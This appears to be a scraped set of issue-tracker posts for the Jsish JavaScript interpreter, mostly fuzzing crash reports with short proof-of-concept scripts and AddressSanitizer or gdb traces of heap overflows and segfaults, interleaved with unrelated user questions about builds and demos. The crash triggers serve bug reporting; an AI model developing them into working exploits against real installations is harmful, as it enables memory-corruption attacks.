0x0c107fffa810: fa fa fa fa fd fd fd fd fd fd fd fd fd fd fd fd
0x0c107fffa820: fa fa fa fa fd fd fd fd fd fd fd fd fd fd fd fd
0x0c107fffa830: fa fa fa fa fd fd fd fd fd fd fd fd fd fd fd fd
0x0c107fffa840: fa fa fa fa fd fd fd fd fd fd fd fd fd fd fd fd
0x0c107fffa850: fa fa fa fa fd fd fd fd fd fd fd fd fd fd fd fd
Shadow byte legend (one shadow byte represents 8 application bytes):
Addressable: 00
Partially addressable: 01 02 03 04 05 06 07
Heap left redzone: fa
Heap right redzone: fb
Freed heap region: fd
Stack left redzone: f1
Stack mid redzone: f2
Stack right redzone: f3
Stack partial redzone: f4
Stack after return: f5
Stack use after scope: f8
Global redzone: f9
Global init order: f6
Poisoned by user: f7
Container overflow: fc
Array cookie: ac
Intra object redzone: bb
ASan internal: fe
==75149==ABORTING
Hello Peter,
It is with mixed feeling that I see you on github. Did you abandon fossil? I saw fossil being used in an embedded project and it made me think of you.
I tried downloading the windows binary but it's an ELF binary:
russh@LAYNE MINGW64 ~
$ wget http://jsish.org/bin/jsish.exe
--2020-12-19 13:10:20-- http://jsish.org/bin/jsish.exe
Resolving jsish.org (jsish.org)... 50.116.0.90
Connecting to jsish.org (jsish.org)|50.116.0.90|:80... connected.
HTTP request sent, awaiting response... 301 Moved Permanently
Location: http://jsish.org/download/jsish [following]
--2020-12-19 13:10:20-- http://jsish.org/download/jsish
Reusing existing connection to jsish.org:80.
HTTP request sent, awaiting response... 200 OK
Length: 9053045 (8.6M) [application/octet-stream]
Saving to: 'jsish.exe'
jsish.exe 100%[=================================================>] 8.63M 2.93MB/s in 2.9s
2020-12-19 13:10:23 (2.93 MB/s) - 'jsish.exe' saved [9053045/9053045]
russh@LAYNE MINGW64 ~
$ file jsish.exe
jsish.exe: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), statically linked, with debug_info, not stripped
I was looking at JSI again because there has been a discussion on the new LuaForum.com site about Lua and JavaScript. A number of people have lamented at the lack of embedded JS. I have obviously been directing them to your site. I am a moderator on the site and I invite you to create an account and write an article on JSI. I'd offer to do it but I'm neck deep in other projects.
Anyway, you might be amused to hear I've largely abandoned all other languages besides C and Lua in my personal time. I've been using C exclusively over the last 9 months at work too. I am creating an Windows based llvm-mingw toolchain called WinLua. My work computer is KUbuntu and my primary IDE is Geany. Just picture me shaking fist playfully at you. Is there any new technology tidbit you would like to elucidate me with before I waste more years fussing? Ha ha.
Hope you're well. Merry Christmas!
DongzhuoZhao added on 2020-05-11 05:31:25:
git version:
4603977
save follow testcase as .js format :
new Array(- 256, 0, - 2.0).forEach(encodeURI);
run:
./jsimin poc.js
Result:
zdz@ubuntu:~/jsish$ ./jsimin /home/zdz/debugBug/jsi/bug/poc.js
Segmentation fault (core dumped)
Backtrace:
(gdb) bt
#0 __strlen_avx2 () at ../sysdeps/x86_64/multiarch/strlen-avx2.S:62
#1 0x00005555555b37d4 in Jsi_Strlen (str=0x0) at ./src/jsiChar.c:29
#2 0x00005555555cfdd2 in url_encode (str=0x0) at ./src/jsiCmds.c:1103
#3 0x00005555555d0062 in EncodeURICmd (interp=0x555555865260,
args=0x5555558c6b50, _this=0x5555558c6b90, ret=0x7fffffff5ba0,
funcPtr=0x55555588a510) at ./src/jsiCmds.c:1143
#4 0x000055555558f81a in jsi_FunctionInvoke (interp=0x555555865260,
tocall=0x5555558c67f0, args=0x5555558c6b50, ret=0x7fffffff5ba0,
_this=0x5555558c6a80) at ./src/jsiFunc.c:799
#5 0x000055555558f9b8 in Jsi_FunctionInvoke (interp=0x555555865260,
func=0x5555558c67f0, args=0x5555558c6b50, ret=0x7fffffff5ba0,
_this=0x5555558c6a80) at ./src/jsiFunc.c:823
Found by Dongzhuo Zhao working with ADLab of Venustech
Commit: 9fa798e
Version: v3.5.0
Ubuntu 18.04.5 LTS (Linux 5.4.0-44-generic x86_64)
export CFLAGS='-fsanitize=address'
makeassert(newObj.hasOwnProperty("prop")).throws(SyntaxError, function () {
eval("'use strict'; function _13_0_7_fun() {eval = 42;};");
_13_0_7_fun();
});
$ ./jsish/jsish poc.js
=================================================================
========ERROR: AddressSanitizer: heap-buffer-overflow on address 0x6250000028f8 at pc 0x55bcbd952990 bp 0x7ffd837e9530 sp 0x7ffd837e9520
READ of size 8 at 0x6250000028f8 thread T0
#0 0x55bcbd95298f in jsiEvalCodeSub src/jsiEval.c:1366
#1 0x55bcbd95c15e in jsi_evalcode src/jsiEval.c:2204
#2 0x55bcbd960274 in jsi_evalStrFile src/jsiEval.c:2665
#3 0x55bcbd64f66a in Jsi_Main src/jsiInterp.c:936
#4 0x55bcbde5403a in jsi_main src/main.c:47
#5 0x7f3599d46bf6 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21bf6)
#6 0x55bcbd5e3969 in _start (/usr/local/bin/jsish+0xe8969)
0x6250000028f8 is located 8 bytes to the left of 8192-byte region [0x625000002900,0x625000004900)
allocated by thread T0 here:
#0 0x7f359a9b5f30 in realloc (/usr/lib/x86_64-linux-gnu/libasan.so.4+0xdef30)
#1 0x55bcbd654972 in Jsi_Realloc src/jsiUtils.c:47
SUMMARY: AddressSanitizer: heap-buffer-overflow src/jsiEval.c:1366 in jsiEvalCodeSub
Shadow bytes around the buggy address:
0x0c4a7fff84c0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c4a7fff84d0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c4a7fff84e0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c4a7fff84f0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c4a7fff8500: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
=>0x0c4a7fff8510: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa[fa]
0x0c4a7fff8520: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c4a7fff8530: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c4a7fff8540: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c4a7fff8550: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c4a7fff8560: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Shadow byte legend (one shadow byte represents 8 application bytes):
Addressable: 00
Partially addressable: 01 02 03 04 05 06 07
Heap left redzone: fa
Freed heap region: fd
Stack left redzone: f1
Stack mid redzone: f2
Stack right redzone: f3
Stack after return: f5
Stack use after scope: f8
Global redzone: f9
Global init order: f6
Poisoned by user: f7
Container overflow: fc
Array cookie: ac
Intra object redzone: bb
ASan internal: fe
Left alloca redzone: ca
Right alloca redzone: cb
========ABORTINGCredits: Found by OWL337 team.
Is the home of this project ever going to be Github, or always sourceforge?
Ubuntu 16.04
gcc 5.4.0
version: c95c897
build command:
export JSI__SANITIZE=1
make
test command: ./jsish poc
Desktop Linux
Below is the ASAN outputs.
=================================================================
==111446==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x60200000c2f2 at pc 0x0000004cb802 bp 0x7ffe11e8b650 sp 0x7ffe11e8b640
READ of size 1 at 0x60200000c2f2 thread T0
#0 0x4cb801 in jsi_utf_tocase src/jsiString.c:396
#1 0x4cc578 in StringToLowerCaseCmd src/jsiString.c:428
#2 0x4a82f8 in jsi_FuncCallSub src/jsiProto.c:244
#3 0x72059a in jsiFunctionSubCall src/jsiEval.c:790
#4 0x72059a in jsiEvalFunction src/jsiEval.c:825
#5 0x72059a in jsiEvalCodeSub src/jsiEval.c:1250
#6 0x73335f in jsi_evalcode src/jsiEval.c:2190
#7 0x4a93bd in jsi_FuncCallSub src/jsiProto.c:220
#8 0x720371 in jsiFunctionSubCall src/jsiEval.c:790
#9 0x720371 in jsiEvalFunction src/jsiEval.c:825
#10 0x720371 in jsiEvalCodeSub src/jsiEval.c:1250
#11 0x73335f in jsi_evalcode src/jsiEval.c:2190
#12 0x4a93bd in jsi_FuncCallSub src/jsiProto.c:220
#13 0x720371 in jsiFunctionSubCall src/jsiEval.c:790
#14 0x720371 in jsiEvalFunction src/jsiEval.c:825
#15 0x720371 in jsiEvalCodeSub src/jsiEval.c:1250
#16 0x73335f in jsi_evalcode src/jsiEval.c:2190
#17 0x736037 in jsi_evalStrFile src/jsiEval.c:2496
#18 0x47e0ee in Jsi_Main src/jsiInterp.c:917
#19 0x90be3e in jsi_main src/main.c:44
#20 0x7f09e6f8b83f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2083f)
#21 0x418238 in _start (/home/keven/Fuzzing/jsish-1023/jsish+0x418238)
0x60200000c2f2 is located 0 bytes to the right of 2-byte region [0x60200000c2f0,0x60200000c2f2)
allocated by thread T0 here:
#0 0x7f09e7af7602 in malloc (/usr/lib/x86_64-linux-gnu/libasan.so.2+0x98602)
#1 0x4825c2 in Jsi_Malloc src/jsiUtils.c:52
SUMMARY: AddressSanitizer: heap-buffer-overflow src/jsiString.c:396 jsi_utf_tocase
Shadow bytes around the buggy address:
0x0c047fff9800: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c047fff9810: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c047fff9820: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c047fff9830: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c047fff9840: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
=>0x0c047fff9850: fa fa fa fa fa fa fa fa fa fa fa fa fa fa[02]fa
0x0c047fff9860: fa fa fd fa fa fa fd fa fa fa fd fd fa fa fd fa
0x0c047fff9870: fa fa fd fa fa fa fd fd fa fa fd fd fa fa fd fa
0x0c047fff9880: fa fa fd fa fa fa fd fa fa fa fd fa fa fa fd fa
0x0c047fff9890: fa fa fd fd fa fa fd fa fa fa fd fa fa fa fd fa
0x0c047fff98a0: fa fa 00 00 fa fa 04 fa fa fa 04 fa fa fa fd fa
Shadow byte legend (one shadow byte represents 8 application bytes):
Addressable: 00
Partially addressable: 01 02 03 04 05 06 07
Heap left redzone: fa
Heap right redzone: fb
Freed heap region: fd
Stack left redzone: f1
Stack mid redzone: f2
Stack right redzone: f3
Stack partial redzone: f4
Stack after return: f5
Stack use after scope: f8
Global redzone: f9
Global init order: f6
Poisoned by user: f7
Container overflow: fc
Array cookie: ac
Intra object redzone: bb
ASan internal: fe
==111446==ABORTING
So, I was hoping to use this in conjunction with the V language (https://github.com/vlang/v) but had to learn quickly that just cl jsish.c /Fejsish.exe wouldn't work, because:
C:\Users\ingwi\work\jsish\src/jsi.h(42): fatal error C1083: Datei (Include) kann nicht geöffnet werden: "dirent.h": No such file or directory
dirent.h is, from what I know, a POSIX only API and thus not available in Microsoft's libc. Do you see a possibility for a native build that does not use MinGW?
The idea to create an amalgam by just #includeing all the main source files is pretty smart and this would be a great way to use jsish within V; however, the build would, right now, fail on Windows via MSVC due to the absense of dirent.h
Will this eventually be worked on?
Kind regards,
Ingwie
DongzhuoZhao added on 2020-05-11 03:19:36:
git version:
4603977
save follow testcase as .js format :
v0=/a/g;
var v1="a";
(v1).replace(v0,isFinite);
run:
./jsimin poc.js
Result:
zdz@ubuntu:~/jsish$ ./jsimin /home/zdz/debugBug/jsi/bug/poc.js
Segmentation fault (core dumped)
Backtrace:
Program received signal SIGSEGV, Segmentation fault.
0x000056038750129c in StringReplaceCmd (interp=0x5603881f2260,
args=0x560388254f30, _this=0x560388254f70, ret=0x7ffe29bd5ed0,
funcPtr=0x5603882047d0) at ./src/jsiString.c:656
656 maxArgs = repVal->d.obj->d.fobj->func->argnames->argCnt;
(rr) bt
#0 0x000056038750129c in StringReplaceCmd (interp=0x5603881f2260,
args=0x560388254f30, _this=0x560388254f70, ret=0x7ffe29bd5ed0,
funcPtr=0x5603882047d0) at ./src/jsiString.c:656
#1 0x0000560387560285 in jsi_FunctionSubCall (interp=0x5603881f2260,
args=0x560388254f30, _this=0x560388254f70, ret=0x7ffe29bd5ed0,
tocall=0x56038824e560, discard=1) at ./src/jsiEval.c:857
#2 0x0000560387560767 in jsiEvalFunction (ps=0x56038824d780,
ip=0x560388250af0, discard=1) at ./src/jsiEval.c:918
#3 0x000056038756238b in jsi_evalcode_sub (ps=0x56038824d780,
opcodes=0x56038824e640, scope=0x560388214950,
currentScope=0x5603881fe3f0, _this=0x5603881fe3f0, vret=0x560388231c90)
at ./src/jsiEval.c:1308
#4 0x000056038756810c in jsi_evalcode (ps=0x56038824d780, func=0x0,
opcodes=0x56038824e640, scope=0x560388214950, fargs=0x5603881fe3f0,
_this=0x5603881fe3f0, vret=0x7ffe29bd64b0) at ./src/jsiEval.c:2156
#5 0x0000560387569c5d in jsi_evalStrFile (interp=0x5603881f2260,
path=0x56038824c2e0,
str=0x7ffe29bd6594 "var v0 = /((?!B))|(\S)/g;\nvar v1="a a";\n(v1).replace(v0,isFinite);\n\n", flags=73, level=0) at ./src/jsiEval.c:2470
#6 0x000056038756a005 in Jsi_EvalFile (interp=0x5603881f2260,
fname=0x56038824c2e0, flags=73) at ./src/jsiEval.c:2519
#7 0x00005603874e521c in Jsi_Main (opts=0x7ffe29bddc20)
at ./src/jsiInterp.c:922
DongzhuoZhao added on 2020-05-11 03:55:46:
git version:
4603977
save follow testcase as .js format :
var v1 = new Array((()=>"toString")(), []);
v1.find(isFinite);
run:
./jsimin poc.js
Result:
zdz@ubuntu:~/jsish$ ./jsimin /home/zdz/debugBug/jsi/bug/poc.js
Segmentation fault (core dumped)
Backtrace:
Program received signal SIGSEGV, Segmentation fault.
0x0000555555591d03 in Jsi_ValueIsNumber (interp=0x555555865260, pv=0x0)
at ./src/jsiValue.c:456
456 return (pv->vt == JSI_VT_NUMBER || (pv->vt == JSI_VT_OBJECT && pv->d.obj->ot == JSI_OT_NUMBER));
(gdb) bt
#0 0x0000555555591d03 in Jsi_ValueIsNumber (interp=0x555555865260, pv=0x0)
at ./src/jsiValue.c:456
#1 0x00005555555cfd3e in isFiniteCmd (interp=0x555555865260,
args=0x5555558c74f0, _this=0x5555558c7530, ret=0x7fffffff59e8,
funcPtr=0x55555588b110) at ./src/jsiCmds.c:1094
#2 0x000055555558f81a in jsi_FunctionInvoke (interp=0x555555865260,
tocall=0x5555558c6d40, args=0x5555558c74f0, ret=0x7fffffff59e8,
_this=0x5555558c73e0) at ./src/jsiFunc.c:799
#3 0x000055555558f9b8 in Jsi_FunctionInvoke (interp=0x555555865260,
func=0x5555558c6d40, args=0x5555558c74f0, ret=0x7fffffff59e8,
_this=0x5555558c73e0) at ./src/jsiFunc.c:823
#4 0x00005555555bc062 in jsi_ArrayFindSubCmd (interp=0x555555865260,
args=0x5555558c6f40, _this=0x5555558c7210, ret=0x7fffffff5ba0,
funcPtr=0x55555587e2c0, op=1) at ./src/jsiArray.c:584
#5 0x00005555555bc5dc in jsi_ArrayFindCmd (interp=0x555555865260,
args=0x5555558c6f40, _this=0x5555558c7210, ret=0x7fffffff5ba0,
funcPtr=0x55555587e2c0) at ./src/jsiArray.c:659
#6 0x0000555555616285 in jsi_FunctionSubCall (interp=0x555555865260,
args=0x5555558c6f40, _this=0x5555558c7210, ret=0x7fffffff5ba0,
tocall=0x5555558c1340, discard=1) at ./src/jsiEval.c:857
#7 0x0000555555616767 in jsiEvalFunction (ps=0x5555558c09d0,
ip=0x5555558c25b0, discard=1) at ./src/jsiEval.c:918
operating system: ubuntu18.04
compile command: export JSI__SANITIZE=1 && make
test command: ./jsish poc1
function fail(message) {
}
function assert(condition, message) {
if (!condition)
fail(message);
}
function assertEquals(expression, value, message) {
if (expression != value) {
expression = ('' + expression).replace(/[\r\n]+/g, ')aOD$,0ZA>`W[oxl~4zXIG');
value = ('' + value).replace(/\r?\n/g, '^A-}nr4+Cnb-(+`2M,');
var FDwc = Proxy;
fail('' + value + '' + expression + ';W' + message);
}
}
var d;
d = null;
var jWeN = assert(null, null);
var QJmz = JSON;
for (var i = 0; i < loops; i += 1) {
d = new Date();
d = new function (x) {
return {
toString: function () {
return x.toString();
}
};
}(d.valueOf());
var sDPa = new Map([
[null],
[
null,
null,
null,
null
]
]);
d = d.parentNode;
assert(null, null);
var pxeM = Proxy;
var bsAF = assert(null, null);
}
Below is the ASAN output, We can find that the code has a heap overflow in jsi_evalcode_sub src/jsiEval.c:1325
Commit: 9fa798e
Version: v3.5.0
Ubuntu 18.04.5 LTS (Linux 5.4.0-44-generic x86_64)
export CFLAGS='-fsanitize=address'
makeWebSocket({
"a": 2.3023e-320
})var JSEtest = times(function () {
WebSocket({
'red': (new Object(null % null))
});
}) < times(log(null % null));
assert.sameValue(JSEtest.length, 2, 'newArr.length');$ ./jsish/jsish poc.js
ASAN:DEADLYSIGNAL
=================================================================
ERROR: AddressSanitizer: stack-overflow on address 0x7ffe51210dfc (pc 0x55d8eb693014 bp 0x0fffca2427b6 sp 0x7ffe51210df0 T0)
#0 0x55d8eb693013 in Jsi_LogMsg src/jsiUtils.c:151
#1 0x55d8eb655e02 in Jsi_ValueToString src/jsiValue.c:526
#2 0x55d8eb693929 in Jsi_LogMsg src/jsiUtils.c:229
#3 0x55d8eb655e02 in Jsi_ValueToString src/jsiValue.c:526
#4 0x55d8eb693929 in Jsi_LogMsg src/jsiUtils.c:229
#5 0x55d8eb655e02 in Jsi_ValueToString src/jsiValue.c:526
#6 0x55d8eb693929 in Jsi_LogMsg src/jsiUtils.c:229
...... ...... ......
...... ...... ......
#246 0x55d8eb693929 in Jsi_LogMsg src/jsiUtils.c:229
#247 0x55d8eb655e02 in Jsi_ValueToString src/jsiValue.c:526
#248 0x55d8eb693929 in Jsi_LogMsg src/jsiUtils.c:229
#249 0x55d8eb655e02 in Jsi_ValueToString src/jsiValue.c:526
#250 0x55d8eb693929 in Jsi_LogMsg src/jsiUtils.c:229
SUMMARY: AddressSanitizer: stack-overflow src/jsiUtils.c:151 in Jsi_LogMsg
====ABORTINGCredits: Found by OWL337 team.
Commit: 9fa798e
Version: v3.5.0
Ubuntu 18.04.5 LTS (Linux 5.4.0-44-generic x86_64)
export CFLAGS='-fsanitize=address'
makevar x = [assert(arrObj.hasOwnProperty("1"), 'arrObj.hasOwnProperty("1") !== true')];
var arr = x.concat();
if (arr[0] !== 0) {
$ERROR('#1: var x = [0,1]; var arr = x.concat(); arr[0] === 0. Actual: ' + (arr[0]));
}
$ ./jsish/jsish poc.js
=================================================================
========ERROR: AddressSanitizer: heap-buffer-overflow on address 0x6250000000f8 at pc 0x5606c5363cbc bp 0x7ffd726922f0 sp 0x7ffd726922e0
READ of size 8 at 0x6250000000f8 thread T0
#0 0x5606c5363cbb in jsiEvalCodeSub src/jsiEval.c:1289
#1 0x5606c536515e in jsi_evalcode src/jsiEval.c:2204
#2 0x5606c5369274 in jsi_evalStrFile src/jsiEval.c:2665
#3 0x5606c505866a in Jsi_Main src/jsiInterp.c:936
#4 0x5606c585d03a in jsi_main src/main.c:47
#5 0x7efcba589bf6 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21bf6)
#6 0x5606c4fec969 in _start (/usr/local/bin/jsish+0xe8969)
0x6250000000f8 is located 8 bytes to the left of 8192-byte region [0x625000000100,0x625000002100)
allocated by thread T0 here:
#0 0x7efcbb1f8f30 in realloc (/usr/lib/x86_64-linux-gnu/libasan.so.4+0xdef30)
#1 0x5606c505d972 in Jsi_Realloc src/jsiUtils.c:47
SUMMARY: AddressSanitizer: heap-buffer-overflow src/jsiEval.c:1289 in jsiEvalCodeSub
Shadow bytes around the buggy address:
0x0c4a7fff7fc0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c4a7fff7fd0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c4a7fff7fe0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c4a7fff7ff0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c4a7fff8000: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
=>0x0c4a7fff8010: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa[fa]
0x0c4a7fff8020: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c4a7fff8030: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c4a7fff8040: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c4a7fff8050: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c4a7fff8060: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Shadow byte legend (one shadow byte represents 8 application bytes):
Addressable: 00
Partially addressable: 01 02 03 04 05 06 07
Heap left redzone: fa
Freed heap region: fd
Stack left redzone: f1
Stack mid redzone: f2
Stack right redzone: f3
Stack after return: f5
Stack use after scope: f8
Global redzone: f9
Global init order: f6
Poisoned by user: f7
Container overflow: fc
Array cookie: ac
Intra object redzone: bb
ASan internal: fe
Left alloca redzone: ca
Right alloca redzone: cb
========ABORTINGCredits: Found by OWL337 team.
One of the issues i have using modules and libraries with jsish, is that the documentation and help system, while broad, is not deep. It is also not clear how to extend the help to cover my own code. Often i have to read source in this jsish repo to get an idea of what is available and how to use it.
The self documenting concept/idea is to integrate a tool like jsdoc2md, as part of the integrated help system. The self documenting use case would extend jsish help to scan the available jsi source, (in local, vfs etc.) to build a reference manual based on available code. A jsdoc capability could also be used to dynamically document jsdoc supported external components like Vue.js. If not dynamically, then including static jsdoc to markdown step in the build step can be used to generate the Vue.js documentation for \lib\www\md. from unminified js source. JSDoc is based on /** .... *\ C style comments, so could also generate API docs from the C source.
In principle jsdoc information could also be used to improve/extend es5lint. That is, to compare jsdoc api documentation with api implementation, something like the es5lint-plugin-jsdoc.
Ubuntu 16.04
gcc 5.4.0
version: 73f457f
build command:
export JSI__SANITIZE=1
make
test command: ./jsish poc
Below is the ASAN outputs.
==86028==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000000 (pc 0x000000575f24 bp 0x62e000000400 sp 0x7ffe49e19ee0 T0)
#0 0x575f23 in Jsi_TreeObjGetValue src/jsiObj.c:11
#1 0x457481 in Jsi_ValueKeyPresent src/jsiValue.c:1133
#2 0x73c00c in jsiEvalCodeSub src/jsiEval.c:1632
#3 0x7506ec in jsi_evalcode src/jsiEval.c:2190
#4 0x4c517a in jsi_FuncCallSub src/jsiProto.c:220
#5 0x44bc0a in jsi_FunctionInvoke src/jsiFunc.c:771
#6 0x44bc0a in Jsi_FunctionInvoke src/jsiFunc.c:783
#7 0x4f7093 in jsi_ArrayReduceSubCmd src/jsiArray.c:641
#8 0x4c405d in jsi_FuncCallSub src/jsiProto.c:244
#9 0x73eaa4 in jsiFunctionSubCall src/jsiEval.c:790
#10 0x73eaa4 in jsiEvalFunction src/jsiEval.c:825
#11 0x73eaa4 in jsiEvalCodeSub src/jsiEval.c:1250
#12 0x7506ec in jsi_evalcode src/jsiEval.c:2190
#13 0x75317f in jsi_evalStrFile src/jsiEval.c:2496
#14 0x499c46 in Jsi_Main src/jsiInterp.c:917
#15 0xc0345a in jsi_main src/main.c:44
#16 0x7f6b078bb83f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2083f)
#17 0x434f48 in _start (/home/keven/Fuzzing/jsish-1024/jsish+0x434f48)
AddressSanitizer can not provide additional info.
SUMMARY: AddressSanitizer: SEGV src/jsiObj.c:11 Jsi_TreeObjGetValue
==86028==ABORTING
Ubuntu 16.04
gcc 5.4.0
version: a6fc196
build command:
export JSI__SANITIZE=1
make
test command: ./jsish poc
Desktop Linux
Below is the ASAN outputs.
I just discovered Jsish and am in the process of understanding the landscape.
Following https://docs.jsish.org/Demos.md I get:
D:\> jsish -a jsi-app.fossil Ledger
mopts { file:"jsi-app.fossil", noPatches:false, type:"fossil", version:"" }
CALL BACKTRACE:
#1: Archive.jsi:108: in moduleRun( "jsi-app.fossil", "Ledger" )
#2: Archive.jsi:105: in Archive( [ "jsi-app.fossil", "Ledger" ], {} )
#3: Archive.jsi:16: in moduleRun()
#4: Ledger.jsi:1696: in Ledger( [], {} )
#5: Ledger.jsi:1597: in main()
#6: Ledger.jsi:133: in createDb( 0, "C:/Users/mhwilkie/LedgerJsi/ledgerjs.db" )
Ledger.jsi:133: error: db open failed: C:\Users\mhwilkie\code/C:/Users/mhwilkie/LedgerJsi/ledge
rjs.db (c-extn [Sqlite])
ERROR:
It looks like a problem merging current directory with HOMEDRIVE and HOMEPATH .
Ubuntu 16.04
gcc 5.4.0
version: 17c32ef
build command:
export JSI__SANITIZE=1
make
test command: ./jsish poc
Below is the ASAN outputs.
=================================================================
==139092==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x60200000a694 at pc 0x7f881c593935 bp 0x7ffeee682e00 sp 0x7ffeee6825a8
READ of size 5 at 0x60200000a694 thread T0
#0 0x7f881c593934 in __asan_memcpy (/usr/lib/x86_64-linux-gnu/libasan.so.2+0x8c934)
#1 0x5c18de in memcpy /usr/include/x86_64-linux-gnu/bits/string3.h:53
#2 0x5c18de in Jsi_DSAppendLen src/jsiDString.c:109
#3 0x5ecbb3 in Jsi_UtfSubstr src/jsiUtf8.c:130
#4 0x4e2180 in StringSubstrCmd src/jsiString.c:145
#5 0x4c4f20 in jsi_FuncCallSub src/jsiProto.c:244
#6 0x73e470 in jsiFunctionSubCall src/jsiEval.c:793
#7 0x73e470 in jsiEvalFunction src/jsiEval.c:828
#8 0x73e470 in jsiEvalCodeSub src/jsiEval.c:1253
#9 0x7509a7 in jsi_evalcode src/jsiEval.c:2188
#10 0x4c5eed in jsi_FuncCallSub src/jsiProto.c:220
#11 0x73e07c in jsiFunctionSubCall src/jsiEval.c:793
#12 0x73e07c in jsiEvalFunction src/jsiEval.c:828
#13 0x73e07c in jsiEvalCodeSub src/jsiEval.c:1253
#14 0x7509a7 in jsi_evalcode src/jsiEval.c:2188
#15 0x7534fb in jsi_evalStrFile src/jsiEval.c:2494
#16 0x49ae7e in Jsi_Main src/jsiInterp.c:917
#17 0xc07b32 in jsi_main src/main.c:44
#18 0x7f881ba3383f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2083f)
#19 0x434fc8 in _start (/home/keven/Fuzzing/jsish-1021/jsish+0x434fc8)
0x60200000a694 is located 0 bytes to the right of 4-byte region [0x60200000a690,0x60200000a694)
allocated by thread T0 here:
#0 0x7f881c59f602 in malloc (/usr/lib/x86_64-linux-gnu/libasan.so.2+0x98602)
#1 0x49f4b2 in Jsi_Malloc src/jsiUtils.c:52
SUMMARY: AddressSanitizer: heap-buffer-overflow ??:0 __asan_memcpy
Shadow bytes around the buggy address:
0x0c047fff9480: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c047fff9490: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c047fff94a0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c047fff94b0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c047fff94c0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
=>0x0c047fff94d0: fa fa[04]fa fa fa 00 fa fa fa 00 fa fa fa 00 fa
0x0c047fff94e0: fa fa 00 fa fa fa 00 fa fa fa 00 fa fa fa 00 fa
0x0c047fff94f0: fa fa 00 fa fa fa 00 fa fa fa 00 fa fa fa 00 fa
0x0c047fff9500: fa fa 00 fa fa fa 00 00 fa fa 00 00 fa fa 00 fa
0x0c047fff9510: fa fa 00 00 fa fa 00 00 fa fa 00 fa fa fa 00 00
0x0c047fff9520: fa fa 00 00 fa fa 00 fa fa fa 00 00 fa fa 00 00
Shadow byte legend (one shadow byte represents 8 application bytes):
Addressable: 00
Partially addressable: 01 02 03 04 05 06 07
Heap left redzone: fa
Heap right redzone: fb
Freed heap region: fd
Stack left redzone: f1
Stack mid redzone: f2
Stack right redzone: f3
Stack partial redzone: f4
Stack after return: f5
Stack use after scope: f8
Global redzone: f9
Global init order: f6
Poisoned by user: f7
Container overflow: fc
Array cookie: ac
Intra object redzone: bb
ASan internal: fe
==139092==ABORTING
Hi Peter,
I just wanted to pass on some information. There is a new lightweight JIT called MIR - Medium Internal Representation. It is only 16,000 lines of code and claims close to native C performance in some scenarios.
An overview of the project is here: https://developers.redhat.com/blog/2020/01/20/mir-a-lightweight-jit-compiler-project/
MIR has been used to create a new "dialect" of Lua called Ravi. Ravi is a JIT-ed language that has optional static typing (sound familiar?). I haven't tried Ravi yet but it's on my todo list.
MIR looks like a very good technology and is written by a Senior GCC contributor. I thought I would pass on that tidbit. Feel free to close after you've read this. Cheers!
I've tried to follow instructions in the documentation for running sample application Ledger.
$ jsish -v
3.4.9 3.0409 c3469e6dd397c8009dd867fcb2dc9e9c1696189c 2020-12-20 18:58:29 UTC
$ jsish -a jsi-app.fossil Ledger
mopts { file:"/home/vitalije/.FOSSILS/jsi-app.fossil", noPatches:false, type:"fossil", version:"ver-1.0302" }
Fossil mount: ver-1.0302 /vfs1 /home/vitalije/.FOSSILS/jsi-app.fossil
not a valid check-in: 2.13
CALL BACKTRACE:
#1: Archive.jsi:108: in moduleRun( "-version", "ver-1.0302", "/home/vitalije/.FOSSILS/jsi-app.fossil", "Ledger" )
#2: Archive.jsi:105: in Archive( [ "/home/vitalije/.FOSSILS/jsi-app.fossil", "Ledger" ], { version:"ver-1.0302" ...)
#3: Archive.jsi:39: in main()
#4: Jsi_Vfs.jsi:186: in Fossil( "list", "/vfs1", null )
#5: Jsi_Vfs.jsi:154: in Fossil_List()
/zvfs/lib/Jsi_Vfs.jsi:154: error: program exit code (1)
ERROR:
I've also tried to download source code and to build jsish, but even with freshly built jsish, I have same error.
I am using Ubuntu 20.04.
